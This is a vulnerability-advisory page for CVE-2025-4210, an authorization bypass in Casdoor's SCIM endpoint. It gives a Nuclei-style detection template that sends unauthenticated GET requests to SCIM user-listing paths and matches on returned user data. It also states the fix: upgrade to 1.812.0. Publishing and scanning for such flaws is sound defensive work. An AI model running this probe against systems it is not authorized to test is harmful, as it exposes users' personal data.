CVE-2025-4210: Casdoor - Authorization Bypass

2026-01-16 Casdoor PoC Public

Description

Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.

PoC

id: CVE-2025-4210

info:
  name: Casdoor - Authorization Bypass
  author: theamanrawat
  severity: high
  description: |
    Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.
  impact: |
    Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to version 1.812.0.
  reference:
    - https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-4210
    epss-score: 0.01841
    epss-percentile: 0.77924
    cwe-id: CWE-285
  metadata:
    verified: true
    max-requests: 2
    vendor: casdoor
    product: casdoor
  tags: cve,cve2025,casdoor,scim,auth-bypass,disclosure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/scim/v2/Users"
      - "{{BaseURL}}/api/scim/v2/Users"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "schemas"
          - "totalResults"
          - "Resources"
          - "givenName"
        condition: and

      - type: word
        part: header
        words:
          - "application/scim+json"
          - "application/json"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008500c5408323a15792dad666f6688782104a4e931a66e9bd54d4fbeeaaa8b8e30220388826d3dde70a1adc75f70ab7e22f24f3854966a514e80fbcf5a5dccbf3f2de:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities